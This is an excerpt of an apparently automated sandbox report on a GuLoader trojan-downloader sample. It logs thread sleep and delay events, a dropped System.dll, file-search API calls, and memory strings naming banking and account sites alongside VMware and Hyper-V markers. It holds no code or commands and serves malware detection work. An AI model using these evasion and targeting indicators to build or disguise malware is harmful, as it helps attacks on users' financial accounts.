Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596081	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595791	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Window / User API: threadDelayed 8536			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Window / User API: threadDelayed 1306			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsbDEDF.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

API coverage: 1.9 %

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 1552	Thread sleep count: 8536 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 1552	Thread sleep count: 1306 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -597671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -597344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -597015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -596906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -596797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -596468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -596358s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -596248s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -596081s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -595791s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe TID: 6372	Thread sleep time: -594469s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 0_2_00405FFD FindFirstFileA,FindClose,	0_2_00405FFD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040559B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_00405FFD FindFirstFileA,FindClose,	7_2_00405FFD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_00402688 FindFirstFileA,	7_2_00402688
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	7_2_0040559B

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 596081	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595791	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2914231593.00000000075A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000039226000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.00000000391CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
